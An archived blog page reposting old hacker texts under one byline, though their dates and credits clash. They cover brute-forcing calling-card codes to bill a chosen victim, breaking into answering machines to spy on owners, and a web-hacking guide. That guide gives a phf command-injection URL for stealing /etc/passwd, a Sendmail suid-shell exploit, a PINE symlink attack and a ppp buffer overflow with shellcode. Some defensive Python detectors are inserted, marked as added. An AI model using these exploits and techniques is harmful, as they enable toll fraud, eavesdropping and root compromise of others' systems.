02/01/2011 - 03/01/2011 - Kingdom Web's

Kingdom Web's

Welcome to Kingdom Web's. Extra Stuff!!! with 0% Charge. Totally Free The best way to Learn Free Courses and gain Ideas.


Monday, February 14, 2011

Hacking Calling Cards

Pyromania Publishing Article #0006
---------------------------------------
Title| Hacking Calling Cards
By   | Anoj Shrestha
Date | September 23, 1987
Call | the Pyromania BBS! 3o1-xxx-xxxx
Note | Sorry about 40 columns but I
     | prefer the larger characters.
---------------------------------------

Phreak codes are fast running out, and people are getting caught. It's time to pioneer a brand new industry. So far I think this file is original, so I am writing it.

Most, if not all, people have calling cards from AT&T. They can be used from any phone to dial long distance and charge it to your AT&T bill. The objective: to use someone else's card to get free long distance service. These codes are not traced, and they are only FOUR digits! The nice part is you can hack the code for anyone you like and attack a specific person, not a random name like when hacking MCI. Take your worst enemy, when you know his phone number, it's the end...

Format:

a. Dial 0.
b. Dial phone number with area code.
c. Wait for tone.
d. Dial billing number with or without area code.

If your code is correct, the fone will ring. If it is not correct a recording will say "Please dial your card number again, the card number you have dialed is invalid". You can try another four digits but after that it will tell you to call AT&T if it is still invalid.

This is more of a pain to hack because there are a thousand possible codes for each phone number. Just make a short basic program to do the job of dialing all the codes. It's best to do a random scan instead of sequential in my opinion.

If you have something you can add to this file then please tell me...

Cable Scrambling News

Cable Scrambling News
by Anoj Shrestha
-------------------------------------------------------------------------------

CABLE COMPANIES RESPONSIBLE FOR THEFT OF SERVICE

A 1986 Showtime/The Movie Channel study that showed the cable industry itself responsible for half the theft of service (1.4 Billion/year) in the country may have understated the extent of the problem, according to panelists at a recent NCTA convention session on cable piracy.

Jerimy Stern, ex director of the OCST (Office of Cable TV Theft), which is a joint venture funded by the NCTA and the MPAA (Motion Picture Assc. of America), stated that many cases of unauthorized reception occur through error or omission on the part of the cable companies and not through any willful, malicious or criminal intent on the part of the viewer. Loosely managed "Hot Disconnects" programs are the primary problem. The "Hot" cable is left in the home to simplify reconnection when the new resident moves in.

One panelist described a "tap verification" audit he did of 18,000 homes, in which they found 332 basic and 1w=2 unauthorized hookups. After identifying a pirate, a "sales specialist" was sent out to sign him up. They found 23% were willing, making the program highly profitable. Cable companies are now following this lead and are setting up their own "tap audit" programs.

The OCST has also become active in the prosecuting of dealers of pirate decoders (currently a highly profitable business) using third party resources of the FBI and Customs Service. Customs is trying to cut the flow of offshore decoders (Taiwan) being imported.

Civil suits are being used sparingly because of their high cost, the possibility of receiving nothing in return and the possibility of countersuits for false prosecution. When a suit is won the PR people are quick to publicize it through the media.

Hacking AT&T Answering Machines

Hacking AT&T Answering Machines
Quick and Dirty
by Anoj Shrestha
Written Today / 14-SEP-2011
(c) 1995 Communications

1. Dial telephone and wait for AT&T Answering Machine to answer.

2. Quickly enter the following string:

    1234567898765432135792468642973147
    4193366994488552277539596372582838
    491817161511026203040506070809001

   (btw: this is the shortest string for entering every possible 2-digit combo.)

3. You'll know you hit the code because the messages will start playing.

4. Here's a list of TouchTone(c) commands:

    Listen to messages:      7
    Listen to new messages:  6
    Stop:                    #
    Rewind Tape:             2
    Advance Tape:            5
    Clear Messages:          3,3
    Record memo:             *
    Record Announcement:     4,*
    Play Announcement:       4,1
    Turn System On:          0
    Turn System Off:         8,8

Hacking Answering Machines 1990

*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*
    Hacking Answering Machines 1990
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*

By: Anoj Shrestha

AT&T reports that in the year 1990, 11 million people will buy an answering machine for their home use. In 1989, 10 million machines were sold. Everyone has called up a person at one time or another and got the old "leave your name at the beep" message. With this increase in homes using these machines there is also a new form of hacking developing: that of hacking an answering machine.

Why would anyone even want to hack an answering machine, and for what purpose? There are many reasons and things you can do once you have control of someone else's machine. If for some reason you need to spy on a business or person you can hack their machine and take control, using the information for your own personal use. There is also the old "change the message" secret, to make it say something to the effect of "this line accepts all toll charges" so you can bill third party calls to that number. You can also use an answering machine for your own personal use, as in making it your own voice mail type system for people to call. Only do this if you know someone is out of town. If they come home from shopping and find their machine changed it might cause problems. With these basic ideas in mind you can see hacking an answering machine could be very useful to certain individuals.

How can a person hack an answering machine? Well, most answering machines built now have remote access features which allow the owner, or anyone, to call in and press a security code to play their messages. This is where the fun begins. Some older models don't have remote access so you cannot do anything to them. Also, if you know someone has a machine but you call and it doesn't answer, let the phone ring about 15 times. This will tell the machine to turn itself on, so you can hack it. The actual number varies between machines.

To practice hacking some machines I will show you how to get remote access on a few models. Just look and see what kind your friend has and hack it for starters.

Record a Call- Model 2120
-------------------------
Call in and, during the message or after the beep tone to leave a message, enter the 3 digit security code, which you must find yourself. This will rewind the tape and play all new messages. Press 2 to backspace and repeat the last message. Press 3 to fast forward the tape.

Changing your message from remote: call your phone and enter the secret code. After several rapid beeps enter your secret code again. After a short delay you will hear a long tone. After the tone ends begin speaking your message, which may be 17 seconds in length. When finished press the second digit of your secret code to end. The machine will then save your message and play it back.

To turn the unit on from remote let it ring 11 times then hang up. Or stay on and it will answer so you can access the machine. For express calls or frequent calls hit the second digit for two seconds to skip the outgoing message announcement.

Goldstar- Models 6000/6100
--------------------------
Call and enter your 1 digit secret code after you hear the outgoing message announcement. The machine will then play back new messages. Hang up to save messages, or after all messages have been played the machine will give a double beeptone and you may enter your code to erase all messages. You cannot change the outgoing message on this unit.

Cobra- Model AN-8521
--------------------
For this machine there are 2 codes. Both are one digit in length. The first one is the play code. The second is to erase messages from remote. After the outgoing message and beeptone press the play code for 2 seconds to play messages. After each message ends there will be a single beep. At the end of all messages it will beep twice. You may then do the following:

- Replay by pressing the play code again.
- Erase messages by pressing the erase code.
- Hang up and save messages and continue to take additional calls.

To turn this unit on from remote you must let it ring 16 times before it will activate. If it rings 10 times then you hear 3 beeps, it is full and messages need to be erased.

Uniden- Model AM 464
--------------------
This model is one of the more advanced when it comes to remote capabilities. The factory preset security code is 747. This can be changed to as many as five digits of your choice. To gain access from remote type your security code while the outgoing message is playing. Press 1 after hearing the tone and the machine will rewind and play your messages. To fast forward press 7, to resume normal playback press 8. To stop the messages from playing press 8 again. Press 8 to restart the messages or 1 to start from the beginning again. Press 9 to rewind and 8 to resume playing. If you rewind all the way it will beep twice. You need to press 1 to play messages. To save messages press 4. To erase press 6. To turn the machine off from remote press 5 after all messages have been played and the machine beeps twice.

To turn the machine on from remote let the phone ring 12 to 14 times. The machine will beep and then you enter your remote code. This will then turn your machine to answer mode.

This machine also has room monitor options. This allows you to listen to what is going on in the room of the machine. To do this call the machine, enter your security code, and after the beep press 0. The monitor stays on for 60 seconds. You will be warned with 2 beeps at 45 seconds. To continue press 0 again.

To change the outgoing message from remote erase all the messages. Then call back and enter your code; after the tone press 3. It will beep again and you may then leave your new message. Press 3 when finished.

To change the security code from remote, after the beep press # then 1; after the next beep enter your new code followed by the # again.

There is also a call break through where you enter 256 while the outgoing message is playing. This will alarm the persons in the house that someone is calling with a series of loud beeps. Press the * key to stop.

Code-a-phone Model 930
----------------------
To access from remote call and enter your security code after the announcement and tone. Press your code for 3 full seconds. After the new messages have been played you will hear 2 tones. You may then save messages by pressing your code then hanging up. Repeat by entering code, wait for 4 tones, then enter code again. To erase messages hang up when the tape is done playing.

To turn the machine on from remote call and let ring ten times. When the system answers it will have a two second tone. Press your security code. You will hear three double tones to let you know the system is on.

Unisonic- Model 8720
--------------------
One digit code entered after the outgoing message and tone will allow you to hear messages. To change message wait till all new messages have been played; 2 beep tones will be heard. Press code for four seconds. Two beeps will be heard, then the tape will rewind and beep again. Now leave the new message. Press your code when finished to save the new outgoing message. New message will play for you to hear.

Panasonic- Model KX-T2427
-------------------------
Call and enter the three digit code during the outgoing message. Machine will beep once, then beep an amount of times equal to messages. Then rewind and play messages. There will be three beeps after the last message. Six beeps means the tape is full. Press 2 to forward. Press 1 to rewind. Press 3 to reset machine and erase messages.

To monitor the room press 5 after the beeps indicating the number of messages the machine has. Press 7 to change the outgoing message; it will beep a few quick times, rewind, then a long beep will be heard. Leave new message, press 9 when finished. Press 0 right after the beep tones to shut the machine off.

To turn the machine on let it ring 15 times then hang up after machine turns on.

Panasonic- Model KX-T2385d
--------------------------
During the outgoing message enter the 1 digit code. This will play back messages. Press the code again to rewind. After the messages have played the machine will beep three times. Press your code again and it will reset the machine. For remote turn on let phone ring 15 times. Then after the outgoing message hang up.

AT&T- Model 1504
----------------
Enter 2 digit code before or after announcement. System will beep after each message and five times when messages are done. Press the # key anytime to pause. Hanging up will save messages. Press 7 and it will rewind and play messages again. Press 5 to fast forward. Press 2 to rewind. Press 33 after all messages have been played to reset without saving messages.

To record onto the tape press * after the system answers. This will then beep and you may leave a four minute message on the tape. Press # when done. This is not an outgoing message announcement, only a memo.

To turn on from remote let ring ten times, press 0 when system answers. To turn the system off dial and enter your code. Press 88 and it will shut the machine down.

Phonemate- Model 4050
---------------------
Enter your 3 digit code during the outgoing message. Pressing * or # will allow you to scan through the messages. When finished pressing 1 will replay the messages. Pressing 2 will erase them. To turn on from remote let ring for 15 times. Then proceed with remote operations.

Phonemate- Model 7200
---------------------
Enter 1 digit code during or after the outgoing message. A voice will tell you how many messages you have, then play them back for you. To rewind press your code and hold it for however long you want to rewind. Let go and it will resume playing. After the last message a voice will prompt you with a list of options. You have five seconds to respond or it will proceed to the next option. These are as follows:

- The first is hanging up to save messages.
- Next is enter code to replay messages.
- Next enter code to erase messages.
- Last is enter code to change greeting.

Follow the voice and it will give you complete directions on exact steps to follow. To turn on from remote let ring ten times then hang up. If tape is full it will say sorry tape is full, enter code and erase messages.

Spectra Phone- Model ITD300
---------------------------
Enter your 1 digit code after the greeting. Messages will play back. Hanging up will save them. Or wait for four beeps and press your code to replay them. To erase press your code after 2 beeps. To turn the machine on from remote let it ring 10 times.

Notes: Outgoing message and greeting is what you hear when you first call. Code is your personal security code.

Hacking answering machines can be very easy. It can also help you obtain valuable information. If you have a targeted machine you can try going to a store and saying you just bought one and it didn't have instructions in the box. They will usually give you a set or make copies for you. This basic guide is just to introduce you to answering machine hacking and changing the outgoing message and listening to messages left by callers. To keep your own machine safe purchase one with a changeable security code of 3 or more digits. Most home machines are of the 1 digit type and are easy to hack.

I have no knowledge of the laws concerning hacking into someone's answering machine. I am sure once it becomes more common we will find out. Of course this article is for informational purposes only so you would never have to find out the actual laws.

Taken from TAP Magazine Issue #100

Hacking Webpage

Author : Anoj Shrestha

Well, Psychotic wrote one of the most helpful unix text files in cyberspace, but with the mail that we received after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody, so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok, well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need to learn a little about the password file...

    root:User:d7Bdg:1n2HG2:1127:20:Superuser
    TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
    BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

    root:x:0:1:Superuser:/:
    ftp:x:202:102:Anonymous ftp:/u1/ftp:
    ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text).

Below is another example of a shadowed password file:

    root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:
    sys:x:3:3:0000-Admin(0000):/:
    adm:x:4:4:0000-Admin(0000):/var/adm:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:uid no body:/:
    noaccess:x:60002:60002:uid no access:/:
    webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
    pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
    ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password, or sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.

1. The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation.

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well, I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

    http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for http://www.webpage.com/ you would type:

    http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file (if it works).

Telnet and Exploits

Well, exploits are the best way of hacking webpages but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, you can just do a netsearch and find everything you need.

It's best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I'm going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4. It creates a suid program /tmp/x that calls shell as root.
This is how you set it up:

    cat << _EOF_ >/tmp/x.c
    #define RUN "/bin/ksh"
    #include
    main()
    {
    execl(RUN,RUN,NULL);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
    main()
    {
    execl("/usr/lib/sendmail","/tmp/smtpd",0);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
    main()
    {
    setuid(0); setgid(0);
    system("chown root /tmp/x ;chmod 4755 /tmp/x");
    }
    _EOF_
    #
    #
    gcc -O -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
    echo "leet..."
    /tmp/x
    fi

And now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.

Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was written by Sean B. Hamor... For this example, hamors is the victim while catluvr is the attacker:

    hamors (21 19:04) litterbox:~> pine

    catluvr (6 19:06) litterbox:~> ps -aux | grep pine
    catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
    hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

    catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
    -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

    catluvr (8 19:07) litterbox:~> ps -aux | grep pine
    catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

    catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

    hamors (23 19:09) litterbox:~> pine

    catluvr (11 19:10) litterbox:~> ps -aux | grep pine
    catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
    hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

    catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

    catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
    + +

    catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

    catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Now on to another one; this will be the last one that I'm going to show. Exploitation script for the ppp vulnerability as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work. This is how you set it up:

    #include
    #include
    #include

    #define BUFFER_SIZE 156 /* size of the bufer to overflow */
    #define OFFSET -290 /* number of bytes to jump after the start of the buffer */

    long get_esp(void) { __asm__("movl %esp,%eax\n"); }

    main(int argc, char *argv[])
    {
    char *buf = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    char execshell[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
    int i,j;

    buf = malloc(4096);

    /* fill start of bufer with nops */
    i = BUFFER_SIZE-strlen(execshell);
    memset(buf, 0x90, i);
    ptr = buf + i;

    /* place exploit code into the buffer */
    for(i = 0; i < strlen(execshell); i++)
    *ptr++ = execshell[i];

    addr_ptr = (long *)ptr;
    for(i=0;i < (104/4); i++)
    *addr_ptr++ = get_esp() + OFFSET;

    ptr = (char *)addr_ptr;
    *ptr = 0;

    setenv("HOME", buf, 1);
    execl("/usr/sbin/ppp", "ppp", NULL);
    }

Now that you've gotten root, "what's next?" Well, the choice is up to you, but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while; you can now upload your pages, delete all the logs and just plain do your worst.

Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learning ethical hacking that you download our Unix Bible.
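Added example (not part of the original article): a small auditor for the passwd format described under "Getting the Password File Through FTP". It flags the conditions that make a leaked file useful to a cracker, namely a hash stored in the world-readable file instead of a shadow placeholder, an empty password field, and a second UID 0 account such as the smtp entry in the article's listing. The sample input is constructed, and the function and label names are this example's own.

```python
"""Audit passwd-format text for exposed hashes and extra UID 0 accounts."""
from typing import List, NamedTuple

# Constructed sample in the style of the article's listings; not a real system file.
SAMPLE = """\
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
smtp:x:0:0:mail daemon user:/:
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
guest::1200:20:Guest:/home/guest:/bin/sh
broken line without enough fields
"""


class Finding(NamedTuple):
    line_no: int
    user: str
    issue: str


def hash_exposed(pw_field: str) -> bool:
    """True when field 2 holds something other than a shadow or lock marker."""
    if pw_field == "":
        return False  # reported separately as an empty password
    if pw_field in ("x", "NP"):
        return False  # hash lives in the shadow file, or no password is set
    if pw_field[0] in "*!":
        return False  # locked account markers such as "*", "!!", "*LK*"
    return True


def audit_passwd(text: str) -> List[Finding]:
    """Return one Finding per problem, in file order."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        # name:password:uid:gid:gecos:home:shell
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append(Finding(line_no, fields[0], "malformed"))
            continue
        user, pw_field, uid = fields[0], fields[1], int(fields[2])
        if pw_field == "":
            findings.append(Finding(line_no, user, "empty-password"))
        elif hash_exposed(pw_field):
            findings.append(Finding(line_no, user, "hash-in-passwd"))
        if uid == 0 and user != "root":
            findings.append(Finding(line_no, user, "extra-uid0"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE):
        print(f"line {f.line_no}: {f.user}: {f.issue}")
```

A "hash-in-passwd" finding means the system is not using shadow passwords, so any local user or any service that can read the file can take the hashes offline.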
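Added example (not part of the original article): detection logic for the request shown under "The PHF Technique", run over access-log lines in Common Log Format. It decodes the query string and raises an alert when a CGI request carries a control character such as the %0a newline, or when the phf script is requested at all. The log lines, addresses and verdict labels are constructed for this example.

```python
"""Flag phf-style newline injection in web server access logs."""
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation address range 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2011:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 5120',
    '192.0.2.44 - - [14/Feb/2011:10:01:09 +0000] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 812',
    '192.0.2.51 - - [14/Feb/2011:10:02:00 +0000] '
    '"GET /cgi-bin/search?q=calling+cards HTTP/1.0" 200 2048',
    '192.0.2.60 - - [14/Feb/2011:10:03:30 +0000] '
    '"GET /cgi-bin/phf?Qname=smith HTTP/1.0" 404 210',
]


class Alert(NamedTuple):
    ip: str
    timestamp: str
    verdict: str   # "newline-injection" or "phf-probe"
    served: bool   # True when the server answered 200, so the request may have worked


def classify(line: str) -> Optional[Alert]:
    """Return an Alert for a suspicious request, or None for a clean or unparsable line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    path = unquote(parts.path)
    query = unquote(parts.query)  # "%0a" becomes a real newline here
    served = m["status"] == "200"

    is_cgi = path.startswith("/cgi-bin/")
    has_control_char = any(ord(ch) < 0x20 for ch in query)

    if is_cgi and has_control_char:
        # A newline inside a CGI parameter is how the extra command reaches the shell.
        return Alert(m["ip"], m["ts"], "newline-injection", served)
    if path.rstrip("/").endswith("/cgi-bin/phf"):
        # The script has no place on a maintained server; any hit is a probe.
        return Alert(m["ip"], m["ts"], "phf-probe", served)
    return None


def scan(lines: List[str]) -> List[Alert]:
    return [a for a in map(classify, lines) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

An alert with served set to True deserves a look at the response size and at what the CGI script does with its parameters; the durable fix is removing the script and never passing request parameters to a shell.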
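Added example (not part of the original article, and not PINE's code): the lockfile flaw described in the pine section, reduced to the open() call that causes it, beside a hardened form. The unsafe function mirrors the behaviour the article reports (open-or-create, symlinks followed, mode 666); the safe one uses O_EXCL and O_NOFOLLOW with mode 0600. Function names and the temporary paths are assumptions of this example, and everything runs inside a private temporary directory.

```python
"""Symlink-following lockfile creation versus exclusive creation."""
import os
import stat
import tempfile


def create_lock_unsafe(path: str, pid: int) -> None:
    """Open-or-create: if `path` is a symlink, the link target is created and written."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o666)
    try:
        os.fchmod(fd, 0o666)  # world-writable, as in the article's listing
        os.write(fd, f"{pid}\n".encode())
    finally:
        os.close(fd)


def create_lock_safe(path: str, pid: int) -> None:
    """Exclusive create: fails with FileExistsError if anything, even a dangling
    symlink, already sits at `path`. Owner-only permissions."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        os.write(fd, f"{pid}\n".encode())
    finally:
        os.close(fd)


def demo() -> dict:
    """Plant a symlink where the lockfile will go and compare both functions."""
    result = {}
    with tempfile.TemporaryDirectory() as workdir:
        target = os.path.join(workdir, "victim_rhosts")  # stands in for ~user/.rhosts
        lock = os.path.join(workdir, ".302.f5a4")        # lockfile name from the article
        os.symlink(target, lock)                          # pre-planted by another user

        create_lock_unsafe(lock, 1756)
        result["unsafe_followed_symlink"] = os.path.isfile(target)
        result["target_mode"] = stat.S_IMODE(os.stat(target).st_mode)

        os.remove(target)  # reset: the symlink is dangling again
        try:
            create_lock_safe(lock, 1756)
            result["safe_refused"] = False
        except FileExistsError:
            result["safe_refused"] = True
        result["target_after_safe"] = os.path.exists(target)
    return result


if __name__ == "__main__":
    print(demo())
```

Keeping lockfiles in a directory only the owner can write to removes the race entirely; on Linux the fs.protected_symlinks sysctl adds a kernel-level guard for sticky world-writable directories such as /tmp.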

Oreilly IRC Hacks

IRC (Internet Relay Chat) may very well turn out to be the world's most successful hack. In 1988, Jarkko Oikarinen wrote the original IRC program at the University of Oulu, Finland. As he says in his foreword, IRC started as one summer trainee's programming exercise.

A hack grew into a software development project that hundreds of people participated in, and then became a worldwide environment where tens of thousands of people now spend time with each other. I have found many of my friends through IRC and learnt a significant part of my present software engineering knowledge while using and working with IRC.

That would not have been possible without learning from code examples and hacks from others. IRC has continued to grow in popularity since its inception. Millions of people from all over the world now use IRC to chat with friends, discuss projects and collaborate on research. With a simple, clearly defined protocol, IRC has become one of the most accessible chat environments, with clients written for a multitude of operating systems.

And IRC is more than just a simple chat system: it is a network of intercommunicating servers, allowing thousands of clients to connect from anywhere in the world using the IRC protocol. While IRC is easy to get into and many people are happy to use it without being aware of what's happening under the hood, there are those who hunger for more knowledge, and this book is for them.

IRC Hacks is a collection of tips and tools that cover just about everything you'd need to become a true IRC master, featuring contributions from some of the most renowned IRC hackers, many of whom collaborated on IRC, grouping together to form the channel #irchacks on the freenode IRC network (irc.freenode.net).

Like all of our Hacks books, there are many different ways to use IRC Hacks. You can read the book from cover to cover, but you might be better served by picking an interesting item from the table of contents and just diving in. If you're relatively new to IRC, you should consider starting with a few hacks from each progressive chapter.

 Chapter 1 starts you off by showing you how to connect to IRC, while Chapter 2 acquaints you with the everyday concepts you'll need to use IRC effectively. Chapter 3 is all about users and channels, and introduces the first pieces of code. Chapter 4 shows you how to make useful enhancements to IRC clients. Chapter 5 is where you will learn the basics about creating IRC bots, with Chapters 6-12 introducing more complex bots that can be used for logging, servicing communities, searching, announcing, networking, managing channels or simply for having fun. Chapter 13 delves into the IRC protocol in more detail, and Chapter 14 demonstrates some interesting alternative methods for connecting to IRC.

 Finally, Chapter 15 will move you on to new pastures by showing you how to set up your own IRC server. This book presents an opportunity to learn how IRC works and how to make best use of some of the features that have made it the most successful, most scalable, and most mature chat system on this planet. IRC Hacks delves deep into the possibilities.

Sunday, February 6, 2011

How To Hack Web Pages?

February 06, 2011 0
How To Hack Web Pages?
Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file... root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it. 
Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.

1. The first step that you would take is to download or copy the file.

